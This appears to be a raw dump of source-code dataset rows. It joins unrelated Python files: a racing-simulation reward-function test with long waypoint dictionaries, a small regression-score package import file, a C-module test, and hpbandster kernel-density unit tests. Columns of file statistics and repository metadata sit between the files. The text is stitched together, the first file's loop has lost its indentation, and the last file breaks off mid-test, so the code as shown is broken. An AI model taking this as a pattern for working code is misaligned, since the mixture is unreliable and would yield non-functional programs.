(2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.8476821136791086, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9706337566148887, 'all_wheels_on_track': True, 'distance_from_center': 0.013824792099549267, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095972148979683, 'object_in_camera': False, 'heading': 0.7218580573268512, 'objects_speed': [], 'progress': 4.473396663395899, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': 0.0, 'steps': 14.0},
{'is_left_of_center': True, 'projection_distance': 0.9669518365713616, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.9401014233882807, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9776753407209586, 'all_wheels_on_track': True, 'distance_from_center': 0.020965191453877558, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096028325562612, 'object_in_camera': False, 'heading': 1.9265306120411614, 'objects_speed': [], 'progress': 4.946095754047778, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 15.0},
{'is_left_of_center': True, 'projection_distance': 1.0607562161378383, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 4.033901501422587, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9776927210085827, 'all_wheels_on_track': True, 'distance_from_center': 0.02106558857389254, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095984499001538, 'object_in_camera': False, 'heading': 1.173909182022218, 'objects_speed': [], 'progress': 5.425918456624128, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [5, 6], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 16.0},
{'is_left_of_center': True, 'projection_distance': 1.1450366160526708, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 4.118181848735966, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9775953652797049, 'all_wheels_on_track': True, 'distance_from_center': 0.02104085807541295, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095984166466617, 'object_in_camera': False, 'heading': 0.816198971909553, 'objects_speed': [], 'progress': 5.857024652819286, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [5, 6], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 17.0}
]
for step in params:
print(step)
print(reward_function(step))
# print(reward_function(params[0]))
if __name__ == '__main__':
main()
| 276.122857
| 4,891
| 0.774572
| 9,944
| 96,643
| 7.454344
| 0.055511
| 0.010199
| 0.015298
| 0.015136
| 0.894949
| 0.886477
| 0.87327
| 0.867523
| 0.864919
| 0.843658
| 0
| 0.668187
| 0.076477
| 96,643
| 350
| 4,892
| 276.122857
| 0.162338
| 0.025041
| 0
| 0.201581
| 0
| 0
| 0.071841
| 0.009719
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059289
| false
| 0
| 0.003953
| 0.003953
| 0.181818
| 0.071146
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4afdb769365aa89eb2ecdc3f93c366ba4299ae7f
| 83
|
py
|
Python
|
RegscorePy/__init__.py
|
UBC-MDS/model-comparison-package
|
bcb898fe574e72d5b098d2695040f1615e05946c
|
[
"MIT"
] | 19
|
2018-03-03T20:48:19.000Z
|
2022-01-17T01:21:24.000Z
|
RegscorePy/__init__.py
|
UBC-MDS/model-comparison-package
|
bcb898fe574e72d5b098d2695040f1615e05946c
|
[
"MIT"
] | 17
|
2018-02-15T22:49:58.000Z
|
2018-03-22T03:38:58.000Z
|
RegscorePy/__init__.py
|
UBC-MDS/model-comparison-package
|
bcb898fe574e72d5b098d2695040f1615e05946c
|
[
"MIT"
] | 3
|
2018-03-01T22:07:13.000Z
|
2020-03-09T13:13:25.000Z
|
from RegscorePy import aic
from RegscorePy import bic
from RegscorePy import mallow
| 27.666667
| 29
| 0.86747
| 12
| 83
| 6
| 0.5
| 0.583333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 83
| 3
| 29
| 27.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ab2f0fb91b21289228b87b2aa0e3f586c1bab2df
| 90
|
py
|
Python
|
tests/c_module_test.py
|
asottile/setuptools-golang-examples
|
8bdfe883c8a72742158fe07059d1fe429fb8d4e0
|
[
"MIT"
] | 11
|
2016-03-13T03:16:12.000Z
|
2021-08-14T01:53:24.000Z
|
tests/c_module_test.py
|
asottile/setuptools-golang-examples
|
8bdfe883c8a72742158fe07059d1fe429fb8d4e0
|
[
"MIT"
] | 3
|
2017-02-12T12:54:52.000Z
|
2019-09-09T20:55:05.000Z
|
tests/c_module_test.py
|
asottile/setuptools-golang-examples
|
8bdfe883c8a72742158fe07059d1fe429fb8d4e0
|
[
"MIT"
] | 1
|
2016-12-17T13:35:14.000Z
|
2016-12-17T13:35:14.000Z
|
import c_module
def test_c_module():
assert c_module.hello_world() == 'hello world'
| 15
| 50
| 0.722222
| 14
| 90
| 4.285714
| 0.571429
| 0.35
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 90
| 5
| 51
| 18
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.122222
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ab2f5b8d4792fbc59b89398f16ebdca527e22027
| 11,783
|
py
|
Python
|
tests/test_kernels.py
|
RevanMacQueen/HpBandSter
|
3b6a5594df30796f43114f7e0e70c1dc56c11e60
|
[
"BSD-3-Clause"
] | 546
|
2018-01-18T08:09:02.000Z
|
2022-03-25T03:06:24.000Z
|
tests/test_kernels.py
|
RevanMacQueen/HpBandSter
|
3b6a5594df30796f43114f7e0e70c1dc56c11e60
|
[
"BSD-3-Clause"
] | 99
|
2018-02-09T14:00:13.000Z
|
2022-01-11T17:05:44.000Z
|
tests/test_kernels.py
|
RevanMacQueen/HpBandSter
|
3b6a5594df30796f43114f7e0e70c1dc56c11e60
|
[
"BSD-3-Clause"
] | 126
|
2018-02-12T14:08:58.000Z
|
2022-03-08T02:50:33.000Z
|
import os
import unittest
import numpy as np
#from scipy.integrate import quadrature as quadrature
from scipy.integrate import quad as quadrature
from statsmodels.nonparametric import kernels as sm_kernels
from hpbandster.optimizers.kde import kernels as hp_kernels
import ConfigSpace as CS
from pdb import set_trace
rapid_development=True
rapid_development=False
class TestGaussian(unittest.TestCase):
n_train = 256
n_test = 1024
def setUp(self):
self.x_train = np.random.rand(self.n_train)
self.x_test = np.random.rand(self.n_test)
def tearDown(self):
self.x_train = None
self.x_test = None
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_values(self):
for bw in [1e-3, 1e-2, 1e-1, 1]:
sm_values = sm_kernels.gaussian(bw, self.x_train[:,None], self.x_test[None,:])
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=False)
hp_values = hp_kernel(self.x_test)
self.assertTrue(np.allclose(hp_values, sm_values/bw, 1e-4))
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_simple(self):
self.x_train = np.array([0])
for bw in [1e-3, 1e-2, 1e-1]:
# note: for larger bandwidths, the pdf also needs to be truncated as +1,
# which leads to something different than twice the pdf
hp_kernel1 = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=False)
hp_kernel2 = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
hp_values1 = hp_kernel1(self.x_test)
hp_values2 = hp_kernel2(self.x_test)
self.assertTrue(np.allclose(2*hp_values1, hp_values2, 1e-4))
self.x_train = np.array([1])
for bw in [1e-3, 1e-2, 1e-1]:
# note: for larger bandwidths, the pdf also needs to be truncated as +1,
# which leads to something different than twice the pdf
hp_kernel1 = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=False)
hp_kernel2 = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
hp_values1 = hp_kernel1(self.x_test)
hp_values2 = hp_kernel2(self.x_test)
self.assertTrue(np.allclose(2*hp_values1, hp_values2, 1e-4))
# simple test based on 68, 95, 99% rule
self.x_train = np.array([0.5])
for bw, w in ([0.5, 0.6827], [0.25, 0.9545], [1/6, 0.9973]):
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
self.assertAlmostEqual(hp_kernel.weights[0], 1/w, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_quadrature(self):
for bw in [1e-2, 1e-1, 1]:
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
def quad_me(x):
x_test = np.array([x])
pdfs = hp_kernel(x_test)
return(pdfs.mean())
self.assertAlmostEqual(quadrature(quad_me, 0, 1)[0], 1, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_sample(self):
num_samples = 2**20
for bw in [1e-1, 5e-1, 1]:
hp_kernel = hp_kernels.Gaussian(data=self.x_train, bandwidth=bw, fix_boundary=True)
samples = hp_kernel.sample(num_samples=num_samples)
phat1, x = np.histogram(samples, normed=True)
phat2 = hp_kernel((x[1:] + x[:-1])/2).mean(axis=0)
for p1, p2 in zip(phat1, phat2):
self.assertAlmostEqual(p1, p2, delta=5e-2)
class Test1dCategorical(unittest.TestCase):
n_train = 256
n_test = 1024
def setUp(self):
self.configspace = CS.ConfigurationSpace(43)
HPs=[]
HPs.append( CS.CategoricalHyperparameter('cat1', choices=['foo', 'bar', 'baz']))
self.configspace.add_hyperparameters(HPs)
x_train_confs = [ self.configspace.sample_configuration() for i in range(self.n_train)]
self.x_train = np.array( [c.get_array() for c in x_train_confs]).squeeze()
x_test_confs = [ self.configspace.sample_configuration() for i in range(self.n_test)]
self.x_test= np.array( [c.get_array() for c in x_train_confs]).squeeze()
def tearDown(self):
self.configspace = None
self.x_train = None
self.x_test = None
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_values(self):
for bw in [1e-3, 1e-2, 1e-1, 1]:
sm_values = []
for x in self.x_test:
sm_values.append(sm_kernels.aitchison_aitken(bw, self.x_train, x))
sm_values = np.array(sm_values)
hp_kernel = hp_kernels.AitchisonAitken(data=self.x_train, bandwidth=bw, num_values=len(self.configspace.get_hyperparameters()[0].choices))
hp_values = hp_kernel(self.x_test)
self.assertTrue(np.allclose(hp_values.T, sm_values.squeeze(), 1e-4))
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_sample(self):
num_samples = 2**20
for bw in [1e-1, 5e-1, 1]:
hp_kernel = hp_kernels.AitchisonAitken(data=self.x_train, bandwidth=bw, num_values=len(self.configspace.get_hyperparameters()[0].choices))
samples = hp_kernel.sample(num_samples=num_samples)
phat1, phat2 = [], []
for value in [0,1,2]:
phat1.append(np.sum(samples==value)/num_samples)
phat2.append(hp_kernel(np.array([value])).mean(axis=0)[0])
for p1, p2 in zip(phat1, phat2):
self.assertAlmostEqual(p1, p2, delta=5e-3)
self.assertAlmostEqual(np.sum(phat2), 1 , delta=1e-5)
class Test1dInteger(unittest.TestCase):
n_train = 128
n_test = 1024
def setUp(self):
self.configspace = CS.ConfigurationSpace(43)
HPs=[]
HPs.append( CS.UniformIntegerHyperparameter('int1', lower=-2, upper=2))
self.configspace.add_hyperparameters(HPs)
x_train_confs = [ self.configspace.sample_configuration() for i in range(self.n_train)]
self.x_train = np.array([c.get_array() for c in x_train_confs]).squeeze()
x_test_confs = [ self.configspace.sample_configuration() for i in range(self.n_test)]
self.x_test= np.array( [c.get_array() for c in x_test_confs]).squeeze()
def tearDown(self):
self.configspace = None
self.x_train = None
self.x_test = None
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_values(self):
n = self.configspace.get_hyperparameters()[0].upper - self.configspace.get_hyperparameters()[0].lower + 1
for bw in [1e-3, 1e-2, 1e-1, 0.99]:
sm_x_train= np.rint(self.x_train* n - .5).astype(np.int)
sm_x_test = np.rint(self.x_test * n - .5).astype(np.int).squeeze()
sm_values = np.array([sm_kernels.wang_ryzin(bw, sm_x_train[:,None], x) for x in sm_x_test]).squeeze()
hp_kernel = hp_kernels.WangRyzinInteger(data=self.x_train, bandwidth=bw, num_values=n, fix_boundary=False)
hp_values = hp_kernel(self.x_test).squeeze()
self.assertTrue(np.allclose(hp_values.T, sm_values, 1e-4))
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_quadrature(self):
self.x_test = np.array([0,1,2,3,4])/5+(1/10)
for bw in [1e-2, 1e-1, 0.99]:
hp_kernel = hp_kernels.WangRyzinInteger(data=self.x_train, bandwidth=bw, num_values=5, fix_boundary=True)
hp_values = hp_kernel(self.x_test).mean(axis=0)
self.assertAlmostEqual(hp_values.sum(), 1, delta=1e-4)
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_sample(self):
num_samples = 2**20
for bw in [1e-1, 5e-1, 0.99]:
hp_kernel = hp_kernels.WangRyzinInteger(data=self.x_train, bandwidth=bw, num_values=5, fix_boundary=True)
samples = hp_kernel.sample(num_samples=num_samples)
phat1, x = np.histogram(samples, normed=True, bins=[0, 0.2, .4, .6, .8, 1.])
phat1 /= 5 # account for bin width
phat2 = hp_kernel((x[1:] + x[:-1])/2).mean(axis=0)
for p1, p2 in zip(phat1, phat2):
self.assertAlmostEqual(p1, p2, delta=5e-2)
class Test1dOrdinal(unittest.TestCase):
n_train = 128
n_test = 5
def setUp(self):
self.configspace = CS.ConfigurationSpace(43)
HPs=[]
HPs.append( CS.OrdinalHyperparameter('ord1', ['cold', 'mild', 'warm', 'hot']))
self.configspace.add_hyperparameters(HPs)
x_train_confs = [ self.configspace.sample_configuration() for i in range(self.n_train)]
self.x_train = np.array([c.get_array() for c in x_train_confs]).squeeze()
x_test_confs = [ self.configspace.sample_configuration() for i in range(self.n_test)]
self.x_test= np.array( [c.get_array() for c in x_test_confs]).squeeze()
def tearDown(self):
self.configspace = None
self.x_train = None
self.x_test = None
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_values(self):
for bw in [1e-3, 1e-2, 1e-1, 1]:
sm_values = np.array([sm_kernels.wang_ryzin(bw, self.x_train[:,None], x) for x in self.x_test])
hp_kernel = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, fix_boundary=False)
hp_values = hp_kernel(self.x_test)
self.assertTrue(np.allclose(hp_values.T, sm_values, 1e-4))
@unittest.skipIf(rapid_development, "test skipped to accelerate developing new tests")
def test_pdf_boundary_simple(self):
self.x_train = np.array([0])
self.x_test = np.array([0, 1,2,3])
for bw in [1e-3, 1e-2]:
# note: for larger bandwidths, the pdf also needs to be truncated as +1,
# which leads to something different than the scaling computed here
hp_kernel1 = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=False)
hp_kernel2 = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=True)
hp_values1 = hp_kernel1(self.x_test).squeeze()
hp_values2 = hp_kernel2(self.x_test).squeeze()
weight = 1-hp_values1[1:].sum()
self.assertTrue(np.allclose(hp_values1/weight, hp_values2, 1e-4))
self.x_train = np.array([3])
self.x_test = np.array([0,1,2,3])
for bw in [1e-3, 1e-2]:
# note: for larger bandwidths, the pdf also needs to be truncated as +1,
# which leads to something different than the scaling computed here
hp_kernel1 = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=False)
hp_kernel2 = hp_kernels.WangRyzinOrdinal(data=self.x_train, bandwidth=bw, num_values=4, fix_boundary=True)
hp_values1 = hp_kernel1(self.x_test).squeeze()
hp_values2 = hp_kernel2(self.x_test).squeeze()
weight = 1-hp_values1[:-1].sum()
